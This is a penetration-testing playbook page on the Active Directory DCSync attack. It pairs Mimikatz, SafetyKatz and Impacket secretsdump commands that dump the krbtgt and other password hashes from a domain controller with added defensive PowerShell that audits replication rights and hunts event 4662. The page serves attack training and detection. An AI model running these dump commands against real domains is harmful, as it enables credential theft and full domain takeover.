# DCSync

### DC-Sync

To perform a DCSync attack, the acting principal needs the following rights on the Domain object:

1. Replicating Directory Changes ([DS-Replication-Get-Changes](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes))
2. Replicating Directory Changes All ([DS-Replication-Get-Changes-All](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-all))
3. Replicating Directory Changes In Filtered Set ([DS-Replication-Get-Changes-In-Filtered-Set](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-in-filtered-set)) (this one isn’t always needed but we can add it just in case)

By default **Administrators, Domain Admins, Enterprise Admins, and Domain Controllers** groups have the required privileges.

The DCSync attack mimics a Domain Controller so that password hashes can be retrieved: it leverages the **Directory Replication Service (DRS)** Remote Protocol to request replication of account credentials from a DC, exactly as a peer DC would.

To check who has the privileges to request user credentials from a DC (PowerView's `Get-ObjectAcl`):

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```

{% endcode %}
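The same check from the defender's side, written with the RSAT ActiveDirectory module instead of PowerView. This is an added example, not part of the original playbook: it reads the DACL of the domain object, keeps every Allow ACE that grants `GenericAll`, `WriteDacl`, all extended rights, or one of the three replication extended rights by their well-known `rightsGuid` values, and marks whether the principal is one of the four default holders the page names. It assumes a domain-joined host with the ActiveDirectory module installed and read access to the domain object's security descriptor.

```powershell
function Get-DcsyncCapablePrincipals {
    # Added example: list every principal whose ACE on the domain object is enough
    # to run (or grant itself the right to run) DCSync.
    Import-Module ActiveDirectory -ErrorAction Stop

    $Domain  = Get-ADDomain
    $NetBios = $Domain.NetBIOSName

    # Well-known rightsGuid values of the three extended rights listed on this page.
    $ReplicationRights = @{
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
        '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    }

    # Groups that hold these rights by default (as stated on this page). Anything
    # outside this set is a finding to review against the DC and sync inventory.
    $DefaultHolders = @(
        'BUILTIN\Administrators',
        "$NetBios\Domain Admins",
        "$NetBios\Enterprise Admins",
        "$NetBios\Domain Controllers"
    )

    # The AD: PSDrive is created by the ActiveDirectory module; Get-Acl returns
    # an ActiveDirectorySecurity object whose Access property holds the ACEs.
    $Acl = Get-Acl -Path "AD:\$($Domain.DistinguishedName)"
    foreach ($Ace in $Acl.Access) {
        if ($Ace.AccessControlType -ne 'Allow') { continue }
        $Rights = $Ace.ActiveDirectoryRights.ToString()
        $Guid   = $Ace.ObjectType.ToString()

        $Reason = if ($Rights -match 'GenericAll') {
            'GenericAll (includes all extended rights)'
        } elseif ($Rights -match 'WriteDacl') {
            'WriteDacl (can grant DCSync rights to itself)'
        } elseif ($Rights -match 'ExtendedRight' -and $Guid -eq [guid]::Empty.ToString()) {
            'All extended rights'
        } elseif ($Rights -match 'ExtendedRight' -and $ReplicationRights.ContainsKey($Guid)) {
            $ReplicationRights[$Guid]
        } else {
            $null
        }
        if (-not $Reason) { continue }

        [pscustomobject]@{
            Principal = $Ace.IdentityReference.Value
            Right     = $Reason
            Inherited = $Ace.IsInherited
            Default   = $DefaultHolders -contains $Ace.IdentityReference.Value
        }
    }
}

# Non-default holders sort to the top for review.
Get-DcsyncCapablePrincipals | Sort-Object Default, Principal | Format-Table -AutoSize
```

Expect `NT AUTHORITY\SYSTEM`, `NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS` and the read-only DC groups to appear with `Default = False` in a stock forest; they are normal, but confirm them against your DC inventory. A directory-synchronisation service account (for example the one used by Entra ID Connect) is the most common legitimate non-default holder of both replication rights and should be tracked as such; any ordinary user or service account in this list is a finding.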

### Example Scenarios to Exploit DCSync

1. We assume that we have the hash of a user account that is a member of the Domain Admins group.\
   \
   Since the user is in the DA group, we can use the dumped hash of that user to perform Over-Pass-The-Hash via Mimikatz and then perform DCSync by requesting the credentials of KRBTGT from the DC.
2. We assume that we have the credentials of a user who has WriteDACL rights on the Domain object.\
   \
   Since the user has WriteDACL privileges, we can use them to grant DCSync rights to any user that we own. Once the owned user has DCSync rights, we can run Invoke-Mimikatz from that user's shell and perform the DCSync attack to retrieve the KRBTGT hash.

### Exploit Locally

To use the DCSync feature to get the krbtgt hash, execute one of the commands below with DA privileges in the `us` domain:

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
```

{% endcode %}

### Exploit Remotely

{% code overflow="wrap" %}

```bash
# Impacket's secretsdump.py: replicate secrets from the DC over DRSUAPI (-just-dc)
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

[-just-dc-user <USERNAME>] # Dump only the secrets of that one user
[-pwd-last-set]            # Show when each account's password was last changed
[-history]                 # Dump password history, may be helpful for offline password cracking
```

{% endcode %}
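Both the local (Mimikatz) and remote (`secretsdump.py -just-dc`) variants above reach the DC through the same DRS replication call, so they leave the same trace: a Security event 4662 on the DC whose `Properties` field lists the Get-Changes and Get-Changes-All GUIDs, with the requesting account in `SubjectUserName`. The hunt below is an added example, not part of the original playbook. It assumes that the "Audit Directory Service Access" subcategory is enabled and that the domain object carries a SACL auditing "Replicating Directory Changes All", otherwise no 4662 is written; it also assumes that legitimate replication comes from DC machine accounts (names ending in `$`) plus an allow list of known synchronisation accounts, where `SYNC_ACCOUNT_PLACEHOLDER` is a placeholder to replace.

```powershell
function Find-SuspiciousReplicationEvents {
    # Added example: surface 4662 replication requests on a DC that did not come
    # from a DC machine account or an allow-listed synchronisation account.
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$Hours = 24,
        # Non-DC accounts permitted to replicate secrets (e.g. a directory-sync
        # service account). 'SYNC_ACCOUNT_PLACEHOLDER' is a placeholder to replace.
        [string[]]$AllowedAccounts = @('SYNC_ACCOUNT_PLACEHOLDER')
    )

    # The two extended rights a credential-replication request is audited against.
    $ReplicationGuids = @(
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
    )

    # Get-WinEvent throws when nothing matches; treat that as an empty result.
    $Events = Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4662
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    foreach ($Event in $Events) {
        # Pull the named EventData fields out of the event XML into a lookup table.
        $Xml  = [xml]$Event.ToXml()
        $Data = @{}
        foreach ($Field in $Xml.Event.EventData.Data) { $Data[$Field.Name] = $Field.'#text' }

        # Properties holds the access mask followed by the {GUID}s that were exercised.
        $Props   = [string]$Data['Properties']
        $Matched = $ReplicationGuids | Where-Object { $Props -match $_ }
        if (-not $Matched) { continue }

        $User = [string]$Data['SubjectUserName']
        # DCs replicate with their machine account (ends in '$'); those and the
        # allow-listed accounts are expected, everything else is worth a look.
        if ($User.EndsWith('$') -or ($AllowedAccounts -contains $User)) { continue }

        [pscustomobject]@{
            Time    = $Event.TimeCreated
            Account = "$($Data['SubjectDomainName'])\$User"
            LogonId = $Data['SubjectLogonId']
            Object  = $Data['ObjectName']
            Rights  = ($Matched -join ', ')
        }
    }
}

Find-SuspiciousReplicationEvents -Hours 24 | Sort-Object Time | Format-Table -AutoSize
```

Run it on each DC (or point `-ComputerName` at one) because 4662 is written only on the DC that served the request. `LogonId` lets you pivot to the matching 4624 to see where the session came from, and the `Object` column should normally be the domain naming context itself; a hit from an interactive user account is the signature of the scenarios described above.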
